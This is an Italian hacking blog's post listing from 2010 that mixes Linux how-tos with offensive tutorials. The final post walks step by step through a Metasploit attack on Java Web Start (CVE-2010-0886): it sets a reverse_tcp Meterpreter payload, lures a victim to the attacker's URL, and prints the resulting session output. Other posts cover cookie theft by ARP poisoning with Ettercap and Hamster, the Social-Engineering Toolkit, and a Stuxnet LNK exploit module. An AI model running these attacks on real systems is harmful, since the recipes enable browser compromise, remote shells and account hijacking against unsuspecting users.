Categorie:


Translate:
Italiano flagInglese flagFrancese flagTedesco flagPortoghese flagSpagnolo flag

[guide pdf metasploit]Ripassiamo Meterpreter :D

luglio 29th, 2010 by clshack

Oggi ho trovato questo interessante articolo:
http://sixthevicious.wordpress.com/2010/07/25/meterpreter/
Visto che tante cose non me le ricordavo, ed essendo ormai sempre in contatto con metasploit, ho deciso di pdfettizzare tutto :D


Ecco le guide:
[DOWNLOAD PDF]Ripassiamo Meterpreter scritta da six, sopra il suo blog :D
[metasploit]Aprire una sessione VNC :)
Mini guida, scritta da un nostro collaboratore(luigi), anni luce fa, ma sempre ottima.

DOWNLOAD GUIDA COMPLETA

Buona lettura :D

Tags:
Posted in Hacking | 1 Comment »

[CVE-2010-2568]Metasploit:windows Oday Remote Code Exuction

luglio 28th, 2010 by clshack

Ne parlano quasi tutti, però non tutti sanno che è uscito il modulo, per sfruttare questo exploit con metasploit :D
Stuxnet, è un worm che si sta diffondendo sempre più velocemnte, sfruttando la vulnerabilità:CVE-2010-2568 che sfrutta una solita cattiva gestione dei file LNK di windows, permettendo ad attaccker di eseguire codice remoto sulla vittima, oppure propagando i file maligni tramite supporti rimovibili.


I prodotti vulnerabili, sono:

  • Windows XP Service Pack 3
  • Windows XP Professional x64 Edition Service Pack 2
  • Windows Server 2003 Service Pack 2
  • Windows Server 2003 x64 Edition Service Pack 2
  • Windows Server 2003 with SP2 for Itanium-based Systems
  • Windows Vista Service Pack 1 and Windows Vista Service Pack 2
  • Windows Vista x64 Edition Service Pack 1 and Windows Vista x64 Edition Service Pack 2
  • Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2
  • Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2
  • Windows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based Systems Service Pack 2
  • Windows 7 for 32-bit Systems
  • Windows 7 for x64-based Systems
  • Windows Server 2008 R2 for x64-based Systems
  • Windows Server 2008 R2 for Itanium-based Systems

Vediamo come sfruttare questa vulnerabilità con metasploit :D
More…

Tags: , , , , ,
Posted in GNU/Linux, Hacking, Software | No Comments »

[Install]BackTrack USB Persistent Mode

luglio 27th, 2010 by clshack

Vediamo come installare backtrack in persistent mode su una chiavetta usb :D

Software necessario:
uNetBootIn:Installare facilmente distribuzioni Linux su USB.
E un partizionatore :D se siete pratici fate da terminale altrimenti più comodamente si può usare gparted.

Adesso partizioniamo la nostra chiavetta, (consiglio una da 4 GB).
Creiamo una partizione fat32 da 1.8 GB e chiamiamola come vogliamo ;)
Creiamo un’altra partizione, il restante spazio in ext3 e chiamiamola: casper-rw
More…

Tags: , , ,
Posted in GNU/Linux, Software | 3 Comments »

Reverse connection | Share Desktop

luglio 20th, 2010 by clshack

In “hacking”, si sente spesso parlare di reverse shelle o bind shell .

Spiegazione rapida rapida:

La reverse shell,la più utilizzata, a differenza della bind shell, si connette a noi, ad una nostra porta aperta, fornendoci ad esempio un prompt di comandi.

Invece, la bind shell, cerca di aprirsi una porta sul computer stesso, dove noi ci andremo a connettere.

Ormai, però non funziona quasi più, poichè i pc sono quasi tutti dietro a router/firewall.

Guardano un po’ sul web, ho trovato una cosa molto bella :D
Condividere il desktop in reverse connection.
Cioè il client sta in ascolto e il server ci invia i dati :D

Vediamo come connetterci ad ubuntu da remoto, senza aprire la porta ad ubuntu :D


Questo tipo di connessione offre notevoli vantaggi, visto che non dovremo aprire porte sul firewall ubuntu, perciò un eventuale attaccker, non potrà vedere che abbiamo il server vnc attivo, e sfruttare eventuali vulnerabilità o tentando attacchi brute force o altre cose :D
More…

Tags: , , ,
Posted in Articoli su GNU/Linux, GNU/Linux, Software | No Comments »

HTTP session hijacking with Ettercap and Hamster

luglio 18th, 2010 by clshack

Grazie ad ettercap, è possibile effettuare in semplicità attacchi arp poisoning.

Per ulteriori approfondimenti:
TUTORIAL

Hamster, è un tool, che estrae dai pacchetti catturati con wireshark, durante un attacco arp poisoning, tutti i cookie.

In questo modo, non essendo loggati, sfruttando il cookie della vittima, nel 90 % dei casi potremo usufruire delle pagine in cui è loggato, ad esempio gmail.

Dal sito ufficiale:

Hamster is a proxy server.
There are a couple ways sidejacking could work.
One way would be a browser add-on.
Another way would be as a proxy server.
The hacker would connect through the proxy, which would then rewrite the cookies on behalf of the hacker.
The following shows Hamster in action. On this screen, we see the web browser “console” screen.

Vediamo come utilizzarlo sul nostro ubuntino :D

Apriamo la nostra console o.O
sudo -s
wget http://www.clshack.it/nopaste/install_hamster.sh
More…

Tags: , , , , ,
Posted in GNU/Linux, Hacking, Software | No Comments »

[UBUNTU/LINUX] Automatic INSTALL :D

luglio 15th, 2010 by clshack

Quando si formattano spesso i pc, ci si rompe le palle a installare su ogni uno gli stessi software, a sistemare le impostazioni e così via.
Per ovviare questo problema, un po’ di tempo fa ho proposto questo:

Trasporta la tua installazzione di UBUNTU su LIVE CD
Remastersys è un ottimo tool, però, volevo qualcosa di ancora più minimale e ottimale, e sopratutto che facesse tutto in automatico.

Girando e girando su google, finalmente ho trovato ciò che mi serviva :D
kickstart Configuration

Ho visto che funziona su redhat, debian , ubuntu e molte altre distribuzioni.

Vediamo come installarlo su ubuntu e iniziare a creare il file per l’installazione automatica del sistema:

Apriamo il nostro terminalino :D
sudo apt-get install -y system-config-kickstart
More…

Tags: , , , ,
Posted in Articoli su GNU/Linux, GNU/Linux, Software | 4 Comments »

Google (in)security ? o.O

luglio 10th, 2010 by clshack

E’ 10 giorni che ho la febbre non passa più porco cazzo merda aaaaaaaaa poi con sto caldo di merda aaaaaaaa vabbè.

Dicono che alla segnalazione di bug, rispondano così:

Si, è vero, è un bug, ma non sappiamo come patchare.. hai qualche suggerimento?


Stiamo parlando della google security, non penso siano così idioti.

Però, sinceramente non stanno molto attenti alla sicurezza.

Un paio di anni fa’, evilsocket, ha dimostrato che caricando su igoogle Gadgets fatto ad hoc, è possibile prendere il controllo del browser della vittima.

Evil, faceva solo un alert(document.cookie), ma se avesse inserito script come beef ?o.O

Tutto questo perchè google non effettua un controllo sui Gadgets caricati dagli utenti.

D’altronde non può nemmeno controllare a mano i tantissimi Gadgets che vengono caricati giornalmente.

Questo problema è valido anche per le estensioni di google chrome oppure di firefox, dove è stato trovato un worm.
More…

Tags: , ,
Posted in Hacking | 6 Comments »

[Ubuntu-Server] Auto login and Startx :D

giugno 30th, 2010 by clshack

E’ da un po’ che non scrivo articoli su ubuntu, ma il tempo non basta mai.

Dopo una installazione minimale di ubuntu (netinstall), e una installazione core di lxde, volevo togliermi anche la procedura di login, volevo un login AUTOMATICO :D

Dove cercare ?

Su una live cd ubuntu, visto che esse si autologgano con l’utente “ubuntu“.

Alla fine, tra un casino e altro ho trovato come fare.

Allora, apriamo con privilegi root il file: /etc/init/tty1.conf.

sudo geany /etc/init/tty1.conf

More…

Tags: ,
Posted in Articoli su GNU/Linux | 4 Comments »

[How To] Social Engineering Toolkit with Metasploit

giugno 27th, 2010 by clshack

Il Social-Engineering Toolkit (SET) è stato realizzato da David Kennedy e mette a disposizione degli attacker alcuni notevoli exploit, di tipo Social-Engineering con una comoda interfaccia :D

L’obiettivo principale di SET è la automazione di tali attacchi, sfruttando quasi sempre la stupidità umana.

Vediamo come utilizzarlo.
sudo apt-get install python-pexpect
Dobbiamo fare un link simbolico altrimenti non va SET se non abbiamo backtrack 4:
sudo -s
mkdir /pentest
mkdir /pentest/exploits/
mkdir /pentest/exploits/framework3/
sudo ln -s "WHERE_IS_METASPLOIT/*" /pentest/exploits/framework3/
Ad esempio:
sudo ln -s /home/clshack/msf3/* /pentest/exploits/framework3/


Andiamo nel terminale, e scarichiamo la versione più aggiornata:

svn co http://svn.thepentest.com/social_engineering_toolkit/ SET/
cd SET
sudo ./set
Una volta aperto, avremo un menù un po’ lamerico -.-’


1. Spear-Phishing Attack Vectors
2. Website Attack Vectors
3. Infectious USB/CD/DVD Generator
4. Update the Metasploit Framework
5. Update the Social-Engineer Toolkit
6. Create a Payload and Listener
7. Mass Mailer Attack
8. Help, Credits, and About
9. Exit the Social-Engineer Toolkit

Vediamo nel dettaglio le opzioni.

1. Spear-Phishing Attack Vectors
Digitando 1, avremo sostanzialmente 3 opzioni:

  • Perform a Mass Email Attack
  • Create a FileFormat Payload
  • Create a Social-Engineering Template

More…

Tags: , , , , ,
Posted in GNU/Linux, Hacking, Software | 7 Comments »

[Metasploit]Sun Java Web Start Plugin Remote Code Excution

giugno 27th, 2010 by clshack

Exploit, abbastanza vecchio, CVE-2010-0886, ma ne parlo lo stesso per un ovvio motivo.

Se siete su windows, account limitato, java NON SI AGGIORNA, al meno che non abbiate la password di amministrator.
Problema al quanto risolvibile, almeno per me, ma non per molti altri.

Soluzioni contro questo exploit ?
Upgrade to J2SE 1.4.2_07
Upgrade to J2SE 5.0 Update 2

Ma se uno è utente limitato come fa ad aggiornare, al meno che non ci sia un server che distribuisca e installa gli aggiornamenti all’avvio/spegnimento di windows, cosa rara, gli utenti sono tutti FOTTUTI.

Vediamo come usare questo exploit, in metasploit:
sudo svn update
sudo ./msfconsole
use windows/browser/java_ws_arginject_altjvm
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST YOUR_IP
set SRVPORT 80

Se avete apache:
sudo service apache2 stop

set URIPATH /
exploit
Output simile:
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.39:4444
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.1.39:80/
[*] Server started.

Ora facciamo visitare alla vittima:
http://YOUR_IP:80
Output simile:

[*] Request for "/" does not contain a sub-directory, redirecting to /X2EbB9v10GNe/ ...
[*] Responding to "GET /X2EbB9v10GNe/" request from 192.168.1.154:1105
[*] Sending js detection HTML to 192.168.1.154:1105...
[*] Responding to "GET /X2EbB9v10GNe/ijIcZf4C.shtml" request from 192.168.1.154:1105
[*] Sending JS version HTML to 192.168.1.154:1105...

E se tutto va bene:
sessions -i 1

e vi si pare meterpreter :D

Tags: , , , ,
Posted in Hacking | 5 Comments »
« Older Entries